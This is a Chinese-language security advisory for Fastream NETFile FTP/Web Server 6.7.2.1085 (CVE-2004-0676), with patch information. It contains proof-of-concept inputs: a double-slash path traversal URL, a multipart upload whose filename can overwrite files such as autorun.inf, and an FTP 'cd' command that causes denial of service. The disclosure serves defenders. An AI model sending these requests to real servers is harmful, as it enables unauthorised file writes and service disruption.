Fastream NETFile FTP/Web Server输入验证错误漏洞
发布日期:2004-07-04
更新日期:2004-07-08
受影响系统:Fastream NETFile FTP/Web Server 6.7.2.1085
不受影响系统:Fastream NETFile FTP/Web Server 6.7.3
描述:
BUGTRAQ ID:
13388
CVE(CAN) ID:
CVE-2004-0676
Fastream NETFile Server是一款安全加强的FTP和WEB服务程序。
Fastream NETFile Server存在多个输入验证错误问题,远程攻击者可以利用这个漏洞绕过ROOT目录限制,破坏系统。
问题是Netfile处理两个斜杠存在问题,提交如下请求:
http://HOST:PORT/?command=mkdir&filename=..//FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
C:\>dir FOLDE*
Volume in drive C is W2000P
Volume Serial Number is xxxx-xxxx
Directory of C:\
07/03/2004 07:47p <DIR> FOLDER_IS_OUTSIDE_THE_ROOT_DIRECTORY
0 File(s) 0 bytes
1 Dir(s) 119,015,936 bytes free
Netfile允许在"command"参数中使用其他方法,可用于建立删除ROOT目录之外的文件和文件夹。
要利用上传文件漏洞,可发送如下POST请求:
-----------------------------7d42c98700ea
Content-Disposition: form-data; name="upfile"; filename="D:\foo.txt"
Content-Type: text/plain
THIS IS AN EXAMPLE
-----------------------------7d42c98700ea--
如果文件名类似Filename="//..//autorun.inf",就可能导致替代系统上的文件。
另一个漏洞是FTP服务程序对'cd /////A'缺少正确处理,提交此命令可导致FTP挂起一段时间,造成拒绝服务。
<*来源:Andres Tarasco Acuna (
at4r@haxorcitos.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=108904874104880&w=2
*>
建议:
厂商补丁:
Fastream
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
下载使用Fastream NETFile FTP/Web Server v6.7.3版本:
http://www.fastream.com/netfileserver.htm浏览次数:3393
严重程度:0(网友投票)